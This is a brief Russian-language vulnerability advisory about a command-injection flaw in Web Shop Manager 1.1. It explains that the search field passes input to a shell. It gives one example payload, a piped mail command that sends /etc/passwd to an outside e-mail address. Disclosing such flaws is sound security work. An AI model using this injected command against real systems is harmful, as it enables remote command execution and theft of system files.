Web Shop Manager позволяет управлять Web магазином через Web интерфейс.
Обнаруженная уязвимость позволяет удаленному злоумышленнику выполнять произвольные команды с привилегиями используемого сценария. Возможно, например, послать файл с паролями на любой E-mail, вводя следующую команду в поле поиска в Web Shop Manager:
|mail user@host.com < /etc/passwd
Уязвимость обнаружена в Web Shop Manager version 1.1.
